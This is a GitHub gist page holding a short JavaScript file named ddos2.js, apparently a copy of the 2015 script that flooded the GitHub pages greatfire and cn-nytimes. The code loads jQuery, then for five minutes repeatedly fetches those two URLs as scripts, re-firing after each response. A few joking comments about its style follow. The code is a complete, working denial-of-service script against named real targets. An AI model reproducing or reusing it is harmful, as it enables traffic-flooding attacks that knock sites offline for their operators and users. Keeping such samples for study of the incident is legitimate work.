Created
March 27, 2015 07:25
-
-
Save zhufenggood/6a38c2a2b2185977b3cb to your computer and use it in GitHub Desktop.
ddos2.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); | |
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>"); | |
startime = (new Date).getTime(); | |
var count = 0; | |
function unixtime() { | |
var a = new Date; | |
return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 | |
} | |
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]; | |
NUM = url_array.length; | |
function r_send2() { | |
var a = unixtime() % NUM; | |
get(url_array[a]) | |
} | |
function get(a) { | |
var b; | |
$.ajax({ | |
url: a, | |
dataType: "script", | |
timeout: 1E4, | |
cache: !0, | |
beforeSend: function() { | |
requestTime = (new Date).getTime() | |
}, | |
complete: function() { | |
responseTime = (new Date).getTime(); | |
b = Math.floor(responseTime - requestTime); | |
3E5 > responseTime - startime && (r_send(b), count += 1) | |
} | |
}) | |
} | |
function r_send(a) { | |
setTimeout("r_send2()", a) | |
} | |
setTimeout("r_send2()", 2E3); |
@makevoid, this is the output of the beautifier which was run on minified code. It's hard to know what they originally wrote since the two snippets are semantically identical AFAIK.
They are using jQuery lazy bastards :)
Does this allow for github's alert("WARNING: malicious javascript detected on this domain")
to flow back?
Game: Is there better warning they could put?
@phuicy yea because they use 'script' as type(?)
From jQuery docs:
"script": Evaluates the response as JavaScript and returns it as plain text.
So my game is even more fun then.
Can't write simple AJAX without jQuery, Pass on hiring.
lol too long proccess of loading additional the heavy lib jQuery instead of native Javascript
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It doesn't make sense why they're doing it
also this doesn't make sense, why:
vs
lol